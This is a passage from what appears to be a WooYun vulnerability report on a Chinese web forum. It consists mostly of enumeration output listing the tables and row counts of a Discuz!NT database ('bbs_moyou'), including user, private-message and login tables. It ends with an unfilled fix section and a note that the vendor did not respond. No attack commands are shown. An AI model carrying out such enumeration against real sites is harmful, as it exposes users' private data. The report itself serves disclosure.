| dbo.dnt_online                       | 13      |
| dbo.dnt_invitation                   | 10      |
| dbo.dnt_attachtypes                  | 6       |
| dbo.dnt_navs                         | 6       |
| dbo.dnt_bbcodes                      | 5       |
| dbo.dnt_admingroups                  | 3       |
| dbo.dnt_polls                        | 2       |
| dbo.dnt_templates                    | 2       |
| dbo.dnt_announcements                | 1       |
| dbo.dnt_creditslog                   | 1       |
| dbo.dnt_notices                      | 1       |
| dbo.dnt_postid                       | 1       |
| dbo.dnt_ratelog                      | 1       |
| dbo.dnt_searchcaches                 | 1       |
| dbo.dnt_statistics                   | 1       |
| dbo.dnt_tablelist                    | 1       |
| dbo.sysdiagrams                      | 1       |
+--------------------------------------+---------+
Database: bbs_moyou
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.dnt_myposts                      | 55915   |
| dbo.dnt_moderatormanagelog           | 54780   |
| dbo.dnt_userfields                   | 14936   |
| dbo.dnt_users                        | 14936   |
| dbo.dnt_pms                          | 14935   |
| dbo.dnt_onlinetime                   | 12971   |
| dbo.dnt_posts1                       | 1402    |
| dbo.dnt_mytopics                     | 1306    |
| dbo.dnt_topics                       | 1003    |
| dbo.dnt_scheduledevents              | 891     |
| dbo.dnt_statvars                     | 356     |
| dbo.dnt_trendstat                    | 344     |
| dbo.dnt_medals                       | 99      |
| dbo.dnt_smilies                      | 88      |
| dbo.dnt_adminvisitlog                | 42      |
| dbo.dnt_help                         | 29      |
| dbo.dnt_topicidentify                | 17      |
| dbo.dnt_onlinelist                   | 16      |
| dbo.dnt_usergroups                   | 15      |
| dbo.dnt_tags                         | 13      |
| dbo.dnt_forumfields                  | 8       |
| dbo.dnt_forums                       | 8       |
| dbo.dnt_online                       | 8       |
| dbo.dnt_attachtypes                  | 6       |
| dbo.dnt_navs                         | 5       |
| dbo.dnt_admingroups                  | 3       |
| dbo.dnt_bbcodes                      | 2       |
| dbo.dnt_topictypes                   | 2       |
| dbo.dnt_failedlogins                 | 1       |
| dbo.dnt_forumlinks                   | 1       |
| dbo.dnt_postid                       | 1       |
| dbo.dnt_searchcaches                 | 1       |
| dbo.dnt_statistics                   | 1       |
| dbo.dnt_tablelist                    | 1       |
| dbo.dnt_templates                    | 1       |
+--------------------------------------+---------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)